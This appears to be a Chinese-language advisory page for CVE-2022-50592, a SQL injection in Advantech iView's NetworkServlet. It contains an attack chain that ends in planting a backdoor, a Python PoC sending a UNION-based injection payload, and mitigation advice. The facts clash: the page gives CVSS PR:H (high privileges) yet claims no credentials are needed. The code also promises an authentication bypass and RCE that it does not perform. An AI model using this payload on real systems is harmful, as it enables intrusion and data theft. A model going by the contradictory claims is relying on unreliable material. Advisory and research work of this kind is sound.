CVE-2022-50592 Advantech iView getInventoryReportData参数SQL注入导致RCE

漏洞信息

漏洞编号

CVE-2022-50592

漏洞类型

SQL注入/认证绕过/远程代码执行

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Advantech iView

漏洞概述

CVE-2022-50592是Advantech iView网络管理工具中的一个高危安全漏洞，CVSS评分7.2。该漏洞存在于SNMP管理功能模块，攻击者可以通过绕过身份认证检查，访问到NetworkServlet端点中的getInventoryReportData参数，从而触发SQL注入漏洞。成功利用此漏洞后，攻击者可以在服务器上以管理员权限执行任意代码，实现完全的主机控制。此漏洞影响iView 5.7.04 build 6425之前的所有版本。由于该漏洞可通过网络远程利用且不需要用户交互，危害性极高，建议受影响用户尽快升级到最新版本或采取临时缓解措施。

技术细节

该漏洞的根源在于Advantech iView的SNMP管理工具存在认证绕过和SQL注入两个安全问题。首先，攻击者可以利用认证绕过漏洞，无需提供有效凭证即可访问受保护的NetworkServlet端点。其次，在getInventoryReportData参数中存在SQL注入点，攻击者可以通过构造恶意SQL语句来操纵数据库查询。攻击者通过组合利用这两个漏洞，可以获取数据库中的敏感信息，甚至通过SQL注入进一步实现操作系统命令执行。由于SQL注入发生在高权限上下文中，成功利用后可获得服务器的管理员权限。整个攻击过程可通过HTTP协议远程完成，无需目标用户的任何交互。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者识别目标环境中运行的Advantech iView版本，确认版本号低于v5.7.04 build 6425

STEP 2

步骤2: 认证绕过

利用SNMP管理工具的认证绕过漏洞，无需提供有效凭证即可访问NetworkServlet端点

STEP 3

步骤3: SQL注入探测

通过getInventoryReportData参数发送测试性SQL注入载荷，确认漏洞存在

STEP 4

步骤4: 敏感信息提取

利用UNION型SQL注入提取数据库版本、用户凭证等敏感信息

STEP 5

步骤5: 权限提升与RCE

通过SQL注入写入恶意代码或利用数据库功能执行系统命令，获得管理员权限

STEP 6

步骤6: 持久化控制

在受害主机上安装后门程序，建立持久化访问通道

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2022-50592 PoC - Advantech iView SQL Injection RCE
# Target: Advantech iView < v5.7.04 build 6425

def exploit(target_ip, target_port=8080):
    """
    Exploit for CVE-2022-50592: SQL Injection in getInventoryReportData parameter
    of NetworkServlet endpoint leading to RCE
    """
    base_url = f"http://{target_ip}:{target_port}"
    
    # Step 1: Bypass authentication and trigger SQL injection
    # The vulnerability exists in getInventoryReportData parameter
    sql_payload = "1' UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL---"
    
    endpoint = "/NetworkServlet"
    params = {
        "getInventoryReportData": sql_payload,
        "action": "getInventoryReportData"
    }
    
    try:
        print(f"[*] Sending exploit to {base_url}{endpoint}")
        response = requests.get(base_url + endpoint, params=params, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful - SQL injection may be present")
            print(f"[+] Response length: {len(response.text)}")
            
            # Check for SQL injection indicators
            if "mysql" in response.text.lower() or "postgresql" in response.text.lower() or "microsoft" in response.text.lower():
                print("[+] SQL injection confirmed - database version exposed")
                return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    exploit(target, port)

影响范围

Advantech iView < v5.7.04 build 6425

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1) 通过网络ACL限制对iView管理接口的访问，仅允许可信IP地址访问；2) 禁用不必要的SNMP管理功能；3) 启用数据库访问日志监控，及时发现异常SQL查询行为；4) 实施强密码策略并定期更换数据库和应用管理员密码；5) 考虑在网络边界部署IPS/IDS设备，对SQL注入特征进行实时检测和阻断。